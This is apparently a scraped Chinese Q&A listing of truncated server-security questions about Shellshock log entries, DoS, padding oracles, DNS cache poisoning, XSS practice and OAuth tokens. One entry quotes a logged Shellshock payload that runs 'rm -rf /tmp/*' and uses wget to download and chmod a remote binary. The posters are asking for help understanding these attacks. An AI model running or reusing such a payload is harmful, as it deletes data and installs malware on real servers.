218.161.62.117 - - "GET / HTTP/1.1" 400 157 "-" "-"不用说,对于这个服务器来说我想这些都是自动的黑客攻击。但是从nginx请求shell命令的逻辑是什么呢?对于nginx来说,允许访问shell是常见的吗?有可能从这些条目中判断哪
浏览 0提问于2020-07-09得票数 4
1回答
如果我把我在mydomaindotcom网站上使用的SSL证书和私钥给一些黑客,黑客能以任何方式劫持/拦截连接或误用吗?
浏览 3提问于2020-04-12得票数 0
回答已采纳
tl;睡眠()花费了我的服务器资源。使用它来延迟对攻击者的响应可能会花费他/她的时间,但允许DOS。能让他/她等着而不用花我的钱吗?Long首先,在愤怒中,我想我会很聪明,只是不回答请求,让攻击者“永远等待”,因此我想我会使用睡眠(30)。然后,我发现这为攻击者打开了一扇门(特别是当使用超过一个IP的DDos )来驱动我的服务器负载通过屋顶,因为每个“悬空”
浏览 0提问于2014-03-10得票数 6
1回答
是否有可能(以及如何)从网络转储中判断是否存在缓冲区溢出攻击、DoS攻击或暴力攻击?一个DDoS可能更容易识别,但我认为上面提到的那些攻击看起来更像是正常的活动。任何有关如何从网络转储中识别这些攻击的信息都将不胜感激。
浏览 0提问于2014-08-11得票数 0
回答已采纳
我在查看日志时发现了一条非常奇怪的线条。
周五6月26日21:21:36.420706 2015年pid 21172目标WSGI脚本未找到或无法统计: /opt/python/current/app/application.py . By,referer:{ :;};/bin/bash -c "rm -rf /tmp/*;echo wget -O /tmp/ China.Z -foxr >> /tmp/Run.sh;由China.Z >> /tmp/Run.sh回波;echo chmod 777 /tmp/tmp/.echo /tmp/China.Z-fox
浏览 4提问于2015-06-27得票数 2
1回答
我正在编写一个用Python加密数据并听说填充甲骨文攻击的程序,但我认为它们被高估了(我的意思是,真实世界的用途是什么?)即使对于易受攻击的旧实现(判断填充是对还是错的实现,比如SSLv3)。因为:
如果我只需要两个密文c(n-1),c(n),这是最后两个加密消息块,以及一个服务器来告诉我解密的c(n)的填充是否正确,这不意味着服务器只是解密发送给它的所有内容(我的意思是,在收到加密消息时发送整个加密消息并读取输出我的意思是,这是一个服务器错误,它一开始不需要一个键,并
浏览 0提问于2020-08-18得票数 2
回答已采纳
2回答
在iOS 6及以下版本上,希望实现收据验证,以确保IAPs不会被“黑客攻击”,并且免费获得而无需实际付费。我的问题是,iOS 7是否仍然容易受到这些IAP攻击/旁路攻击(自定义DNS、InAppstore黑客等)的攻击?如果是这样,如何在iOS 7中保护IAPs?
浏览 6提问于2013-09-21得票数 0
回答已采纳
1回答
我读了很多关于它的文章,我不明白为什么缓存中毒是可能的,如果:递归解析器一次只发送一个相同域/类型/类的请求,这意味着攻击者不能触发多个相同域的请求来强制执行事务ID。在看似基本的配置中,如果攻击者需要猜测事务ID,缓存中毒是如何发生的?攻击者是否会迫使递归解析器一次又一次地解析同一个域,以便进行更多的尝试?在这种情况下可能需要几个小时..。
浏览 0提问于2020-12-09得票数 1
回答已采纳
1回答
甲骨文机器如何确定HTTP请求是否受到中间人的攻击,例如返回的结果是否被中间人篡改?希望你能帮我!谢谢!
浏览 0提问于2021-03-22得票数 0
回答已采纳
1回答
如何判断客户端是否使用安全连接?我可以在浏览器中使用javascript,但这是不安全的(因为攻击者可以绕过它)
节点服务器可能以HTTP的形式运行,但在安全的nginx/apache代理后面运行。
浏览 1提问于2017-04-17得票数 0
我可以想象来自任何地方的访问者,不管出于什么原因,有些人会通过代理服务器进行连接。这是有问题的,因为很难判断用户是否真的在浏览我的网站,或者是否正在进行DOS。
浏览 0提问于2014-05-11得票数 0
3回答
web服务器的端口25是开放的。我们没有任何电子邮件服务器,因为我们使用谷歌邮件服务器,但端口25仍然是开放的。开着它危险吗?
如果它可以被攻击,那么它如何被攻击呢?
浏览 0提问于2017-07-17得票数 1
回答已采纳
3回答
服务器被攻击?
、、、
7.25号购买了一个月,8.24号续费的,今天有攻击,想换国内硬防服务器,申请退剩余时间,结果说续费不能退,要从7.25算 5天内才可以退,人家阿里云就可以退剩余时间,真是服了,我国内服务器也打算用腾讯云的
浏览 748提问于2018-08-28
病毒运行了一些进程,名为模块,吃cpu,我的服务器供应商告诉我,这是比特币矿工病毒,但他们没有给我任何其他信息。
浏览 0提问于2017-01-09得票数 1
2回答
为了研究SIP服务器的漏洞以及DOS攻击对QoS of VoIP服务的影响,我发现此漏洞可以被利用在SIP服务器上引发DoS。攻击者如何可能造成溢出?OpenSER上可能发生的溢出攻击和拒绝服务攻击之间的关系是什么?
我不了解攻击者的描述和执行的操作。
浏览 0提问于2012-06-22得票数 0
回答已采纳
1回答
永恒的定时攻击和响应抖动
、、、、
我一直在研究永恒的定时攻击,即使用并发性的定时攻击,而不是往返时间。这里是portswigger的一篇文章,它的链接指向梵歌德的原始文章。我理解当从客户端=>服务器进入时,这是如何工作的,但是当服务器响应时,HTTP响应再次出现在不同的数据包中,所以它们不会在返回途中受到抖动的影响,并且可能会出现故障吗?
浏览 0提问于2021-02-22得票数 2
回答已采纳
1回答
我在用mutillidae来提高我的黑客技能。我正在尝试利用用户名字段中的XSS,在注册表单字段中使用toogle安全5,我尝试了我所知道的一切,但我仍然没有设法利用它。<input htmlandxssandsqlinjectionpoint="1" name="username" size="15" autofocus="autofocus" minlength="1" maxlength="15" required="required"
浏览 0提问于2017-05-01得票数 0
我看到了OAuth服务器的实现,这些实现似乎建议将这个随机字符串直接存储在数据库中并进行查找。令牌本质上是用户的另一个密码。这是因为如果数据库被破坏,那么攻击者所要做的就是传递auth_token=code并模拟具有有效令牌的任何用户。
为OAuth 2生成和存储授权令牌的最佳方法是什么?
浏览 0提问于2013-02-25得票数 3
带有易受攻击的bash的服务器,但只启用cgi,而且cgi-bin中没有cgi脚本。它还可以利用吗??
在大多数支持cgi的服务器中,默认脚本名是什么?
浏览 0提问于2014-09-28得票数 2
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
